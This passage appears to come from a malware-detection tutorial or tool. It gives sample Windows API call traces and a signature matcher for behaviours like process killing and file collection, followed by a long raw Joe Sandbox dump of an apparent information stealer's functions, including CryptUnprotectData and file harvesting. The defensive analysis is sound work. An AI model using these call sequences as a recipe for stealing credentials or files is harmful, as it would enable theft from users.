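• Process32Next.KERNEL32(00369FDE,00000128), ref: 0037992E
• StrCmpCA.SHLWAPI(?,00369FDE), ref: 00379943
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0037995C
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0037997A
• CloseHandle.KERNEL32(00000000), ref: 00379987
"""
SAMPLE_FILE_COLLECT = """\
• Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0038523C,?,?,?,003852E4), ref: 00361963
• StrCmpCA.SHLWAPI(?,0038538C), ref: 003619B3
• StrCmpCA.SHLWAPI(?,00385434), ref: 003619C9
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00361D80
• DeleteFileA.KERNEL32(00000000), ref: 00361E0A
• FindNextFileA.KERNEL32(000000FF,?), ref: 00361E60
• FindClose.KERNEL32(000000FF), ref: 00361E72
"""
SAMPLE_KEYBOARD = """\
• GetKeyboardLayoutList.USER32(00000000,00000000,003805B7), ref: 00377D71
• LocalAlloc.KERNEL32(00000040,?), ref: 00377D89
• GetKeyboardLayoutList.USER32(?,00000000), ref: 00377D9D
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00377DF2
• LocalFree.KERNEL32(00000000), ref: 00377EB2
"""
```

Calling `analyze(SAMPLE_PROCESS_KILL)["behaviours"]` yields `["process_kill_loop"]` and `analyze(SAMPLE_FILE_COLLECT)["behaviours"]` yields both `directory_walk` and `file_collection`; the "Part of subcall function" lines are parsed but excluded from signature matching, since they belong to the string helpers at 0037AA50 / 0037AC30 / 0037ACC0 rather than to the function being listed. Signatures are matched as ordered subsequences, so extra calls between the expected ones (the DeleteFileA at 00361E0A, for instance) do not break a match.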
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 433455689-1173974218
                                    • Opcode ID: 6df86099f87d486f4cc9e5acdf8f79f2cc3f125496d1dc535ec05b3cdd66d99b
                                    • Instruction ID: d7b3a022a75ee744ad33dab8f7c92cc87442dfe80ff89b312675dbd13a98beff
                                    • Opcode Fuzzy Hash: 6df86099f87d486f4cc9e5acdf8f79f2cc3f125496d1dc535ec05b3cdd66d99b
                                    • Instruction Fuzzy Hash: 89124372A105189BCB26FB60DDA6EED7379AF94300F4085E9B50F5A091EF346B48CF52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: D{$om$<rYh$aU=o$l`QU$tJ7W
                                    • API String ID: 0-470088399
                                    • Opcode ID: a5ea4ef3d5c8add6c825cc8f11b3b6b0495d9d19dd36472670440d26e217e82d
                                    • Instruction ID: 26dfb20337a923c209b399930b5c40ec91f950987cf4c38c7bf15afbdb5abfd6
                                    • Opcode Fuzzy Hash: a5ea4ef3d5c8add6c825cc8f11b3b6b0495d9d19dd36472670440d26e217e82d
                                    • Instruction Fuzzy Hash: FEB2E8F360C204AFE3046E2DEC8567AFBEAEFD4720F1A453DE6C487744EA3558058696
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O6,00000000,00000000), ref: 0036A23F
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00364F3E,00000000,?), ref: 0036A251
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O6,00000000,00000000), ref: 0036A27A
                                    • LocalFree.KERNEL32(?,?,?,?,00364F3E,00000000,?), ref: 0036A28F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID: >O6
                                    • API String ID: 4291131564-1777326043
                                    • Opcode ID: fb802b3db1ba6920c74e2d0f89f346ebd45e4c84780c6eae3b1f02eb84d94a4e
                                    • Instruction ID: e1cdf650999cd1ee374e53736918a4a3a677ad9638eb220452d53e7fd9da13bd
                                    • Opcode Fuzzy Hash: fb802b3db1ba6920c74e2d0f89f346ebd45e4c84780c6eae3b1f02eb84d94a4e
                                    • Instruction Fuzzy Hash: D611A4B4644308AFEB11CF64CC95FAA77B5EB89B10F208458FD159B390C772AA41CB90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <l?]$N?_$wPb]$.|k$uJ
                                    • API String ID: 0-816137828
                                    • Opcode ID: 339bbb5438a3ed960eed5cb0388d8783ee89ea156c7ce288ce66d9433e664e94
                                    • Instruction ID: e657af983781542db0641b5c8d44422f67da0d607f9553dc368b8342e13af355
                                    • Opcode Fuzzy Hash: 339bbb5438a3ed960eed5cb0388d8783ee89ea156c7ce288ce66d9433e664e94
                                    • Instruction Fuzzy Hash: B3B2F7F360C204AFE3046E2DEC8567ABBE9EF94720F1A493DE6C5C3744EA3558058696
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: \u$\u${${$}$}
                                    • API String ID: 0-582841131
                                    • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                    • Instruction ID: 59d264ad8734ec4fdc756d73e37bc7a08f578193bce3febae78c91772e76d654
                                    • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                    • Instruction Fuzzy Hash: 68418E12E19BC9C5CB068B7444A02AEBFB22FD6210F6E42AEC49D5F782C774454AD3A5
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0036C971
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0036C97C
                                    • lstrcat.KERNEL32(?,00380B47), ref: 0036CA43
                                    • lstrcat.KERNEL32(?,00380B4B), ref: 0036CA57
                                    • lstrcat.KERNEL32(?,00380B4E), ref: 0036CA78
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: 6cbd0ca4ff50c1e1c5ca5f00127b208499f94ae5e7761af93d102b107275b6d7
                                    • Instruction ID: 67d8cca217b98fe79c1b1164d6cc845c4269cb7f946230a9ae7a04a0101b3e19
                                    • Opcode Fuzzy Hash: 6cbd0ca4ff50c1e1c5ca5f00127b208499f94ae5e7761af93d102b107275b6d7
                                    • Instruction Fuzzy Hash: 25415EB590421EDBDB20DFA0DD89BFEB7B9AB48304F1051A8E509A7280D7745B84CF91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 003672AD
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 003672B4
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 003672E1
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00367304
                                    • LocalFree.KERNEL32(?), ref: 0036730E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: 15d2172672bf416ce93db8bece9242f7e001a773032af7b747fc026e23e0c394
                                    • Instruction ID: 089ac1b19aaa7e7ce2012c7ece226e7d03400dfa26da24c83f83a4ab238fb82c
                                    • Opcode Fuzzy Hash: 15d2172672bf416ce93db8bece9242f7e001a773032af7b747fc026e23e0c394
                                    • Instruction Fuzzy Hash: AF0112B5A44308BBDB14DFE4DC46F9E7779EB44B04F108544FB05AB2C0D6B0AA009B94
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003797AE
                                    • Process32First.KERNEL32(00380ACE,00000128), ref: 003797C2
                                    • Process32Next.KERNEL32(00380ACE,00000128), ref: 003797D7
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 003797EC
                                    • CloseHandle.KERNEL32(00380ACE), ref: 0037980A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 9673f8a5148ccc2f4d4ac0af72a19799a7efa73da6b3aff6fac6b042281163f1
                                    • Instruction ID: fba70ab7fed884945f939b2f77c753361467b955d1e02480800f6cbb525c4e7b
                                    • Opcode Fuzzy Hash: 9673f8a5148ccc2f4d4ac0af72a19799a7efa73da6b3aff6fac6b042281163f1
                                    • Instruction Fuzzy Hash: 81011EB5A14208EBDB31DFA4CD44BDEB7F9BB08700F108689E50997240DB349B40CF91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <7\h$huzx
                                    • API String ID: 0-2989614873
                                    • Opcode ID: 7eb3bdc0e0c5d631cfbe53155e1ab1a1baa4b8cd2ca62bdfc37e045bbc204dbd
                                    • Instruction ID: 355decbe2e18364a168f3a1404da1590ec1baf5d09506661d7190114dd2b4acb
                                    • Opcode Fuzzy Hash: 7eb3bdc0e0c5d631cfbe53155e1ab1a1baa4b8cd2ca62bdfc37e045bbc204dbd
                                    • Instruction Fuzzy Hash: CB63667242EBD51ECB27EF3047B61917F66BA1321031D49CEC8C18F9B3C6949A1AE356
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 12Me$Bj}_$Bj}_$fnJ/
                                    • API String ID: 0-3405775522
                                    • Opcode ID: 6aab4c979fa42a94d15d074b855a029c2dc7ec0da00a837b4082132d01cd7320
                                    • Instruction ID: 43d37370351420a59e5a66bd3486f0e8e1718eb5da112e96bd9482bdc2fb4c6a
                                    • Opcode Fuzzy Hash: 6aab4c979fa42a94d15d074b855a029c2dc7ec0da00a837b4082132d01cd7320
                                    • Instruction Fuzzy Hash: 62B2F7F360C2009FE314AE2DEC8567AFBE9EF94720F16492DEAC4C3744E63598458697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: .&-w$/$?$U;zr$Hwo
                                    • API String ID: 0-2796635779
                                    • Opcode ID: fef4ef79e2ba5dca662b589ae2bfdbcfe36f32981b87b79880b6f8ed66eb8b6d
                                    • Instruction ID: a9907df944c73ae354dcc09f455062922b3dfa26d679c44d14ddb743fd11d8f9
                                    • Opcode Fuzzy Hash: fef4ef79e2ba5dca662b589ae2bfdbcfe36f32981b87b79880b6f8ed66eb8b6d
                                    • Instruction Fuzzy Hash: B2B219F3A0C2109FE304AE2DEC8567AFBE5EF94320F16853DEAC487744EA3558058697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 'x~<$,?7o$GCt$h0=
                                    • API String ID: 0-3544228397
                                    • Opcode ID: e2764373d1f6c1766a945e83e457c83168ae60ae2bf41addee26e308dfe130e8
                                    • Instruction ID: bc46337c6850e3b1e74f08649de0c9943b2d837dc782e0d0ac8d8a01c3bd78a1
                                    • Opcode Fuzzy Hash: e2764373d1f6c1766a945e83e457c83168ae60ae2bf41addee26e308dfe130e8
                                    • Instruction Fuzzy Hash: C18219F3A0C2049FE7046E29EC8567AFBE9EF94320F1A493DE6C4C7744EA3558418697
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,003651D4,40000001,00000000,00000000,?,003651D4), ref: 00379050
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    • Opcode ID: 00996610ba0b913aa0d6518d8c6365da4990fa1df793294ece7c352444920805
                                    • Instruction ID: 1b4ae4c90372c42900bfe97cf370f7cc0d8c77df82274a848d7958958ae263de
                                    • Opcode Fuzzy Hash: 00996610ba0b913aa0d6518d8c6365da4990fa1df793294ece7c352444920805
                                    • Instruction Fuzzy Hash: 4C11F5B0214209EFDB25CF54DC84FAB33A9AF89314F10D649FA198B250D779E9419BA0
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00380DE8,00000000,?), ref: 00377B40
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00377B47
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,00380DE8,00000000,?), ref: 00377B54
                                    • wsprintfA.USER32 ref: 00377B83
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: 2e29cd0975765db338a23044b9e27eef54c0f6bfd1a30e1bc075efade2b7021e
                                    • Instruction ID: c5920e8ac192699d116683fe706ae8df675acfb0fdbfc4f7a365a9963348e1f9
                                    • Opcode Fuzzy Hash: 2e29cd0975765db338a23044b9e27eef54c0f6bfd1a30e1bc075efade2b7021e
                                    • Instruction Fuzzy Hash: 54112AF2908119ABCB24DBC9DD45BBFB7F9EB4CB11F10411AF605A2280D3795940C7B0
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00F3D9E0,00000000,?,00380DF8,00000000,?,00000000,00000000), ref: 00377BF3
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00377BFA
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00F3D9E0,00000000,?,00380DF8,00000000,?,00000000,00000000,?), ref: 00377C0D
                                    • wsprintfA.USER32 ref: 00377C47
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    • Opcode ID: bb485feaa3788b25f5042909c3a096cb6431fba05d2d512f24db4d89ccc87800
                                    • Instruction ID: a1dcf638147c4b564546efb79e523b14ae552937505e312975e1309798567400
                                    • Opcode Fuzzy Hash: bb485feaa3788b25f5042909c3a096cb6431fba05d2d512f24db4d89ccc87800
                                    • Instruction Fuzzy Hash: 7A11E1B0909219EBEB218B54DC45FAAB7B8FB04721F0043D9F619A32D0C7781A40CF90
                                    APIs
                                    • CoCreateInstance.COMBASE(0037E120,00000000,00000001,0037E110,00000000), ref: 003739A8
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00373A00
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID:
                                    • API String ID: 123533781-0
                                    • Opcode ID: e566ff25a712e51c5a0a5ddd701ef729154e265361eb7dbdce0d9a7fc6578968
                                    • Instruction ID: 3e9806d6c026b8289fa1a23eead0f6be5108e4f6e999ed846aa12af4b4f07524
                                    • Opcode Fuzzy Hash: e566ff25a712e51c5a0a5ddd701ef729154e265361eb7dbdce0d9a7fc6578968
                                    • Instruction Fuzzy Hash: F841F971A40A289FDB24DB54CC95F9BB7B5BB48702F4081C8E608EB2D0D7B16E85CF50
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0036A2D4
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 0036A2F3
                                    • LocalFree.KERNEL32(?), ref: 0036A323
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
